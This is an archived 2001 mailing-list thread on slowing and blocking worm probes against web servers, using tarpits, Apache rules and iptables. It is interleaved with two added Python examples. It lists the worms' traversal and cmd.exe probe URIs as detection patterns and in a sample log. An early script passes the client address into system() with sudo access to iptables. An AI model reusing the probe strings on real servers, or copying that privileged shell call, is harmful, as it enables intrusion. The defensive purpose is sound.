and then let a script like this waste the attacker's time:
<?
echo "404 This page is not available.\n";
flush();
sleep(150);
?>
This should slow the scanning and thus the waste of bandwidth and spread rate of the infections down. At least, if the worm is single threaded.
Iljitsch van Beijnum
> should make these attacks slow down like they're wading through molasses. Now, if most or all ISPs installed tarpits like this it would seriously reduce the virulence of the attacks.
Actually, if most or all ISPs installed tarpits like this, it would lead exploit developers to implement timeouts that would quickly kill off connection attempts that were progressing at the expected rate. -- Brett
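The two sides of this exchange, as an added example that is not code from any of the posters: a tarpit error handler in the spirit of Iljitsch's sleep() in the 404 document (and of LaBrea's hold-the-connection idea), and Brett's objection that a scanner with a timeout simply walks away from it. The tarpit dribbles the 404 body one byte at a time; a patient client is held for the whole delay, while a client with a short socket timeout abandons the connection on the first stalled read. Everything runs against 127.0.0.1 on an ephemeral port; the delay constants, the probe path and the threading layout are assumptions of this example.

```python
"""Tarpit error document versus a scanner with a timeout (added example)."""
import socket
import socketserver
import threading
import time

TARPIT_DELAY = 0.25   # seconds between dribbled bytes (assumed value)
TARPIT_CHUNKS = 8     # a patient client is therefore held for about 2 s


class TarpitHandler(socketserver.BaseRequestHandler):
    """Answer any request with a 404, then feed the body out one byte at a time."""

    def handle(self):
        self.request.settimeout(2.0)
        try:
            self.request.recv(1024)   # the probe's request line; its contents do not matter
        except OSError:
            return
        try:
            self.request.sendall(b"HTTP/1.0 404 Not Found\r\nContent-Type: text/plain\r\n\r\n")
            for _ in range(TARPIT_CHUNKS):
                time.sleep(TARPIT_DELAY)
                self.request.sendall(b".")   # keeps the socket open and the scanner waiting
            self.request.sendall(b"\n404 This page is not available.\n")
        except OSError:
            pass   # the client hung up first: a scanner with a timeout is not delayed


class TarpitServer(socketserver.ThreadingTCPServer):
    allow_reuse_address = True
    daemon_threads = True


def start_tarpit():
    """Start the tarpit on 127.0.0.1 in a background thread; returns (server, port)."""
    server = TarpitServer(("127.0.0.1", 0), TarpitHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def probe(port, timeout=None, path="/scripts/root.exe?/c+dir"):
    """Worm-style client: one GET, read until the server closes.

    Returns (completed, elapsed_seconds). With timeout=None the client sits
    through the whole tarpit; with a short timeout it gives up on the first
    recv() that stalls, which is what Brett predicts scanners will do.
    """
    start = time.monotonic()
    sock = socket.create_connection(("127.0.0.1", port), timeout=timeout)
    sock.settimeout(timeout)
    try:
        sock.sendall(("GET %s HTTP/1.0\r\n\r\n" % path).encode("ascii"))
        while sock.recv(4096):
            pass
        return True, time.monotonic() - start
    except socket.timeout:
        return False, time.monotonic() - start
    finally:
        sock.close()


if __name__ == "__main__":
    server, port = start_tarpit()
    print("patient client: completed=%s after %.2fs" % probe(port, timeout=None))
    print("client with 0.1 s timeout: completed=%s after %.2fs" % probe(port, timeout=0.1))
    server.shutdown()
    server.server_close()
```

Run it directly and the patient client reports roughly two seconds while the client with a timeout returns in a fraction of a second, having received only the headers. The asymmetry is the point: the tarpit costs the defender a socket and a thread for the full delay whether or not the scanner stays.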
On Tue, Sep 18, 2001 at 09:51:43AM -0700, Joseph McDonald wrote:
One idea: Once a probe is sent, the prober's IP# is stored in a hash (perhaps in shared memory or a mmap'd file that all children can share) and new connections from that IP are no longer accepted.
Better yet, set a host route for them with next hop set to 127.0.0.1. That assumes that you don't want infected hosts talking to your host at all. -- Jeff Gehlbach, Concord Communications <jgehlbach@concord.com> Senior Professional Services Consultant, Atlanta ph. 770.384.0184 fax 770.384.0183
Hello Joseph,

Tuesday, September 18, 2001, 11:51:43 AM, you wrote:

JM> Yes. We are seeing it here bigtime. Does anyone have any apache hacks
JM> to lessen the impact? One idea: Once a probe is sent, the prober's
JM> IP# is stored in a hash (perhaps in shared memory or a mmap'd file
JM> that all children can share) and new connections from that IP are no
JM> longer accepted.

Here's a possibility but I need help with one aspect:

A) create a rule in your apache httpd.conf like this:

<Location /scripts/root.exe>
    Deny from all
    # "Deny from all" answers 403, not 404, so the 403 handler is the one
    # that fires. The error document must be a local path: a full URL makes
    # Apache send the client an external redirect, which the worm never
    # follows, so the script would never run.
    ErrorDocument 403 /blockip.php
</Location>

B) create blockip.php (or use perl or whatever[read: python])

<?php
// Runs as the web-server user, so iptables is invoked through sudo (see C).
// REMOTE_ADDR is taken from the TCP peer rather than a request header, and
// is still shell-quoted before it is handed to system().
$iptables = '/usr/bin/sudo /usr/local/sbin/iptables';
$ip = escapeshellarg($_SERVER['REMOTE_ADDR']);
$blockline = $iptables . ' -A INPUT -s ' . $ip . ' -p all -j DROP';
system($blockline);
?>

C) the caveat here is that you need to give the webuser (nobody) access to iptables. This can be done in sudo like this:

nobody ALL=(root) NOPASSWD: /usr/local/sbin/iptables

The MAJOR problem is that you have now given your entire web site access to iptables. If you have a machine which has no "users" then this may be okay for you however for most of us it is not. Do any of you have a way to call a perl script directly from the httpd.conf entry and perhaps pass the REMOTE_ADDR to it? I know there's a way and I'll look for it, but in the meantime -- any ideas?

Thanks, David Ulevitch mailto:davidu@everydns.net
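An added example, not code from David or anyone else in the thread, that implements Joseph's "remember the prober's address and refuse it" idea without David's privilege problem: rather than letting the web-server user run iptables, a separate privileged process reads the Apache access log, picks out the worm probe URIs (the root.exe, cmd.exe and encoded-traversal requests shown earlier in the thread), and emits one DROP rule per offending source. The log sample is constructed for this example (RFC 5737 documentation addresses); the iptables path, chain and the decision to block on a single probe are assumptions. Hostnames, which appear in a log written with HostnameLookups on, are never passed to iptables.

```python
"""Log-driven blocker for the worm probes discussed in this thread (added example)."""
import ipaddress
import re
import subprocess

# URI fragments taken from the probe lines posted in the thread: root.exe,
# cmd.exe reached by traversal, and the overlong-UTF-8 / double-encoded
# backslash variants used to slip past the path check.
PROBE_PATTERNS = [
    re.compile(r"/root\.exe", re.I),
    re.compile(r"/winnt/system32/cmd\.exe", re.I),
    re.compile(r"%c0%af|%c0%2f|%c1%1c|%c1%9c|%255c|%%35%63|%%35c", re.I),
]

# Apache common/combined log line: host ident user [ts] "METHOD URI PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+)[^"]*" (?P<status>\d{3})'
)

# Constructed sample modelled on the thread's log excerpt. The last line
# uses a resolved hostname, as that excerpt did, to show it is skipped.
SAMPLE_LOG = """\
203.0.113.7 - - [18/Sep/2001:09:55:51 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
203.0.113.7 - - [18/Sep/2001:09:55:52 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
198.51.100.23 - - [18/Sep/2001:09:55:53 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
192.0.2.10 - - [18/Sep/2001:09:56:01 -0400] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"
owned.site.com - - [18/Sep/2001:09:56:02 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 271 "-" "-"
"""


def is_probe(uri):
    """True if the request URI matches one of the worm probe signatures."""
    return any(p.search(uri) for p in PROBE_PATTERNS)


def parse_line(line):
    """Return the fields of one access-log line as a dict, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def probing_hosts(lines):
    """Map each source that sent at least one probe to its probe count.

    Insertion order is kept, so the first offender seen is blocked first.
    """
    counts = {}
    for line in lines:
        rec = parse_line(line)
        if rec and is_probe(rec["uri"]):
            counts[rec["host"]] = counts.get(rec["host"], 0) + 1
    return counts


def iptables_commands(hosts, iptables="/sbin/iptables", chain="INPUT", already_blocked=()):
    """Build one DROP rule per new IPv4 source.

    Anything that is not an IPv4 literal (a resolved hostname, an IPv6
    address that would need ip6tables) is skipped rather than interpolated
    into a command line. The rule is inserted at the head of the chain so
    it takes effect ahead of any ACCEPT rules.
    """
    seen = set(already_blocked)
    cmds = []
    for host in hosts:
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            continue
        if ip.version != 4 or str(ip) in seen:
            continue
        seen.add(str(ip))
        cmds.append([iptables, "-I", chain, "-s", str(ip), "-j", "DROP"])
    return cmds


def apply_block(lines, dry_run=True, already_blocked=()):
    """Return the rules for the probes in `lines`, running them unless dry_run."""
    cmds = iptables_commands(probing_hosts(lines), already_blocked=already_blocked)
    if not dry_run:
        for cmd in cmds:
            subprocess.run(cmd, check=True)   # needs root: run from a log watcher, not from httpd
    return cmds


if __name__ == "__main__":
    for cmd in apply_block(SAMPLE_LOG.splitlines()):
        print(" ".join(cmd))
```

Fed the sample, it produces DROP rules for 203.0.113.7 and 198.51.100.23 only; the normal index.html request and the hostname entry generate nothing. In use the watcher would follow the live log (tail -F style) as root and keep the already-blocked set so each address gets a single rule, which leaves httpd with no more privilege than it had before.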
Look into the Apache::CodeRed module. I'm sure that can be hacked up to do what you need. /nick On Tue, 18 Sep 2001, David Ulevitch wrote:
> Hello Joseph,
> Tuesday, September 18, 2001, 11:51:43 AM, you wrote:
> JM> Yes. We are seeing it here bigtime. Does anyone have any apache hacks
> JM> to lessen the impact? One idea: Once a probe is sent, the prober's
> JM> IP# is stored in a hash (perhaps in shared memory or a mmap'd file
> JM> that all children can share) and new connections from that IP are no
> JM> longer accepted.
> Here's a possibility but I need help with one aspect:
> A) create a rule in your apache httpd.conf like this:
> <Location /scripts/root.exe>
>     Deny from all
>     ErrorDocument 404 http://www.everydns.net/blockip.php
> </Location>
> B) create blockip.php (or use perl or whatever[read: python])
> <?
> $iptables = '/usr/local/sbin/iptables';
> $ip = $REMOTE_ADDR;
> $blockline = $iptables." -A INPUT -s ".$ip." -p all -j DROP;";
> system($blockline);
> ?>
> C) the caveat here is that you need to give the webuser (nobody) access to iptables. This can be done in sudo like this:
> nobody ALL=NOBODY: /usr/local/sbin/iptables
> The MAJOR problem is that you have now given your entire web site access to iptables. If you have a machine which has no "users" then this may be okay for you however for most of us it is not. Do any of you have a way to call a perl script directly from the httpd.conf entry and perhaps pass the REMOTE_ADDR to it? I know there's a way and I'll look for it, but in the meantime -- any ideas?
> Thanks, David Ulevitch mailto:davidu@everydns.net
Hi David Why not use Labrea (developed originally to tarpit CodeRed) ? <http://www.hackbusters.net/LaBrea/> - Rafi On Tue, 18 Sep 2001, David Ulevitch wrote:
> Hello Joseph,
> Tuesday, September 18, 2001, 11:51:43 AM, you wrote:
> JM> Yes. We are seeing it here bigtime. Does anyone have any apache hacks
> JM> to lessen the impact? One idea: Once a probe is sent, the prober's
> JM> IP# is stored in a hash (perhaps in shared memory or a mmap'd file
> JM> that all children can share) and new connections from that IP are no
> JM> longer accepted.
> Here's a possibility but I need help with one aspect:
> A) create a rule in your apache httpd.conf like this:
> <Location /scripts/root.exe>
>     Deny from all
>     ErrorDocument 404 http://www.everydns.net/blockip.php
> </Location>
> B) create blockip.php (or use perl or whatever[read: python])
> <?
> $iptables = '/usr/local/sbin/iptables';
> $ip = $REMOTE_ADDR;
> $blockline = $iptables." -A INPUT -s ".$ip." -p all -j DROP;";
> system($blockline);
> ?>
> C) the caveat here is that you need to give the webuser (nobody) access to iptables. This can be done in sudo like this:
> nobody ALL=NOBODY: /usr/local/sbin/iptables
> The MAJOR problem is that you have now given your entire web site access to iptables. If you have a machine which has no "users" then this may be okay for you however for most of us it is not. Do any of you have a way to call a perl script directly from the httpd.conf entry and perhaps pass the REMOTE_ADDR to it? I know there's a way and I'll look for it, but in the meantime -- any ideas?
> Thanks, David Ulevitch mailto:davidu@everydns.net
participants (30)
- Bill Larson
- Brett Frankenberger
- Bryan Heitman
- Chris Grout
- Christopher X. Candreva
- Daniel Senie
- David Ulevitch
- deeann mikula
- Eric Gauthier
- Eric Germann
- Hermann Wecke
- Iljitsch van Beijnum
- Jared Mauch
- Jeff Gehlbach
- Joe Abley
- Joseph McDonald
- k claffy
- M. David Leonard
- Mark Radabaugh - Amplex
- Michael Airhart
- Nick Thompson
- Rafi Sadowsky
- ravi pina
- Rich Sena
- sigma@pair.com
- Tim Winders
- Ulf Zimmermann
- up@3.am
- Valdis.Kletnieks@vt.edu
- z@s0be.net